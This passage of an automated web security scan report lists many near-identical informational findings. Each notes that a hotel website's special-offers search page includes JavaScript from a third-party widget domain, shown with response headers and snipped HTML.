Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232115775511250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:46:16 GMT
Content-Length: 151036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232115775511250" type="text/javascript"></script>
...[SNIP]...

5.179. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232108674573750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:34:27 GMT
Content-Length: 151098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232108674573750" type="text/javascript"></script>
...[SNIP]...

5.180. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232104955823750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:28:15 GMT
Content-Length: 151054

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232104955823750" type="text/javascript"></script>
...[SNIP]...

5.181. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232697228636250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 18:55:22 GMT
Content-Length: 150966

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232697228636250" type="text/javascript"></script>
...[SNIP]...

5.182. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232099036761250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:18:23 GMT
Content-Length: 296050

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232099036761250" type="text/javascript"></script>
...[SNIP]...

5.183. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110292230000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:37:09 GMT
Content-Length: 150972

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110292230000" type="text/javascript"></script>
...[SNIP]...

5.184. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232115494730000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:45:49 GMT
Content-Length: 151142

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232115494730000" type="text/javascript"></script>
...[SNIP]...

5.185. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232115869573750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:46:26 GMT
Content-Length: 151009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232115869573750" type="text/javascript"></script>
...[SNIP]...

5.186. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110113948750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:36:51 GMT
Content-Length: 150980

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110113948750" type="text/javascript"></script>
...[SNIP]...

5.187. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232116128011250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:46:52 GMT
Content-Length: 296073

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232116128011250" type="text/javascript"></script>
...[SNIP]...

5.188. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111311761250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:38:50 GMT
Content-Length: 151009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111311761250" type="text/javascript"></script>
...[SNIP]...

5.189. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232109941292500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:36:34 GMT
Content-Length: 151255

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232109941292500" type="text/javascript"></script>
...[SNIP]...

5.190. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113074261250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:41:46 GMT
Content-Length: 151044

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113074261250" type="text/javascript"></script>
...[SNIP]...

5.191. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232108179105000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:33:37 GMT
Content-Length: 150974

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232108179105000" type="text/javascript"></script>
...[SNIP]...

5.192. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113786605000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:42:58 GMT
Content-Length: 151009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113786605000" type="text/javascript"></script>
...[SNIP]...

5.193. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111949417500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:39:54 GMT
Content-Length: 150980

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111949417500" type="text/javascript"></script>
...[SNIP]...

5.194. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113124105000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:41:52 GMT
Content-Length: 151030

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113124105000" type="text/javascript"></script>
...[SNIP]...

5.195. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232114982698750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:44:58 GMT
Content-Length: 151033

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232114982698750" type="text/javascript"></script>
...[SNIP]...

5.196. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232103061136250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:25:05 GMT
Content-Length: 151254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232103061136250" type="text/javascript"></script>
...[SNIP]...

5.197. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110922542500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:38:11 GMT
Content-Length: 150980

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110922542500" type="text/javascript"></script>
...[SNIP]...

5.198. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111806605000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:39:39 GMT
Content-Length: 151044

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111806605000" type="text/javascript"></script>
...[SNIP]...

5.199. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232105498792500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:29:09 GMT
Content-Length: 151008

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232105498792500" type="text/javascript"></script>
...[SNIP]...

5.200. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232104554105000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:27:35 GMT
Content-Length: 150974

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232104554105000" type="text/javascript"></script>
...[SNIP]...

5.201. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

